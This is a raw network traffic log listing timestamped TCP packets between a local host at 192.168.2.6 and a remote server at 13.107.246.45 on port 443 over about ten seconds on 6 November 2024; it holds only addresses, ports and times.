Nov 6, 2024 17:03:18.948064089 CET	443	50155	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.950218916 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.950254917 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:18.950330973 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.950478077 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:18.950493097 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.414525986 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.415194035 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.415235996 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.415656090 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.415663958 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.544970989 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.545058966 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.545142889 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.545430899 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.545449972 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.545459032 CET	50156	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.545464993 CET	443	50156	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.548993111 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.549042940 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.549124956 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.549331903 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.549345016 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.672796011 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.673470020 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.673497915 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.673929930 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.673935890 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.691514969 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.692146063 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.692173004 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.692581892 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.692586899 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.802628994 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.802704096 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.802768946 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.802995920 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.803018093 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.803034067 CET	50157	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.803040981 CET	443	50157	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.806135893 CET	50160	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.806180000 CET	443	50160	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.806255102 CET	50160	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.806447983 CET	50160	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.806459904 CET	443	50160	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.825937986 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.825994968 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.826113939 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.826150894 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.826417923 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.826428890 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.826446056 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.826450109 CET	50158	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.826474905 CET	443	50158	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.829643965 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.829690933 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:19.829790115 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.830001116 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:19.830018044 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.285974026 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.286665916 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.286698103 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.287101030 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.287105083 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.415093899 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.415191889 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.415254116 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.415280104 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.415344954 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.415505886 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.415525913 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.415535927 CET	50159	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.415541887 CET	443	50159	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.418174982 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.418242931 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.418322086 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.418467045 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.418482065 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.594765902 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.597460985 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.597496033 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.597913027 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.597918987 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.725003958 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.725117922 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.725240946 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.725461960 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.725482941 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.725493908 CET	50161	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.725503922 CET	443	50161	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.728456020 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.728481054 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:20.728559017 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.728714943 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:20.728729010 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.169852972 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.170627117 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.170665979 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.171078920 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.171088934 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.396759033 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.396902084 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.396996021 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.397005081 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.397269964 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.397300005 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.397315025 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.397315025 CET	50162	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.397324085 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.397330999 CET	443	50162	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.399966002 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.400006056 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.403831959 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.403971910 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.403985023 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.470649004 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.472942114 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.472986937 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.473464966 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.473470926 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.602158070 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.602232933 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.602322102 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.602546930 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.602570057 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.602581978 CET	50163	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.602587938 CET	443	50163	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.605684042 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.605731964 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:21.605832100 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.606012106 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:21.606029987 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.137754917 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.140516043 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.140547037 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.140974045 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.140980005 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.267565966 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.267589092 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.267654896 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.267667055 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.267700911 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.267911911 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.267929077 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.267939091 CET	50164	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.267944098 CET	443	50164	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.270634890 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.270658016 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.270734072 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.270978928 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.270989895 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.379961014 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.380417109 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.380445957 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.380856037 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.380861998 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.560574055 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.560847998 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.560920954 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.560925961 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.560970068 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.561021090 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.561037064 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.561047077 CET	50165	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.561052084 CET	443	50165	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.563529968 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.563549995 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.563628912 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.563764095 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.563777924 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.990694046 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.991147041 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.991166115 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:22.991611004 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:22.991615057 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.120187998 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.121629953 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.121697903 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.121726036 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.121757030 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.121794939 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.121809959 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.121822119 CET	50166	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.121826887 CET	443	50166	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.124277115 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.124320030 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.124408007 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.124524117 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.124533892 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.311824083 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.312345982 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.312374115 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.312757969 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.312763929 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.447973013 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.448048115 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.448128939 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.479443073 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.479473114 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.479486942 CET	50167	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.479492903 CET	443	50167	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.528129101 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.528160095 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:23.528249025 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.539303064 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:23.539324045 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.260802984 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.261291027 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.261307001 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.261735916 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.261740923 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.337924004 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.338507891 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.338532925 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.338977098 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.338983059 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.391472101 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.391635895 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.391693115 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.391815901 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.391849041 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.391869068 CET	50168	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.391879082 CET	443	50168	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.394628048 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.394675970 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.394747972 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.394853115 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.394866943 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.474664927 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.474735975 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.474792004 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.474941015 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.474958897 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.474972010 CET	50169	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.474982023 CET	443	50169	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.477669001 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.477686882 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:24.477777958 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.477940083 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:24.477956057 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.148539066 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.149228096 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.149241924 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.149590015 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.149594069 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.235435963 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.235927105 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.235970974 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.236385107 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.236398935 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.285628080 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.285696983 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.285792112 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.285820007 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.285840988 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.285892010 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.286094904 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.286109924 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.286123037 CET	50170	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.286128998 CET	443	50170	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.289053917 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.289087057 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.289175034 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.289334059 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.289345980 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.366229057 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.366887093 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.366964102 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.367016077 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.367016077 CET	50171	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.367047071 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.367058039 CET	443	50171	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.369929075 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.369978905 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:25.370064020 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.370246887 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:25.370260954 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.341197014 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.341775894 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.341797113 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.342211008 CET	50173	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.342216969 CET	443	50173	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.574590921 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.587918997 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.587939978 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.588371038 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.588376999 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.731595993 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.731688976 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.731744051 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.731760025 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.731812954 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.731859922 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.751991987 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.752015114 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.752026081 CET	50172	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.752032042 CET	443	50172	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.821336031 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.821378946 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:26.821444035 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.821583033 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:26.821590900 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.548161983 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.548736095 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.548753023 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.549211025 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.549217939 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.676860094 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.676896095 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.676949024 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.677099943 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.677099943 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.677318096 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.677335024 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.677344084 CET	50174	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.677350998 CET	443	50174	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.680466890 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.680507898 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.680609941 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.680830956 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.680847883 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.945189953 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.945410013 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.946611881 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.946629047 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.946882963 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:27.947674990 CET	50125	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:27.995330095 CET	443	50125	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.423171043 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.423749924 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.423780918 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.424189091 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.424196005 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.553591967 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.553761005 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.553849936 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.553961039 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.553981066 CET	443	50175	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:28.553992987 CET	50175	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:28.553998947 CET	443	50175	13.107.246.45	192.168.2.6
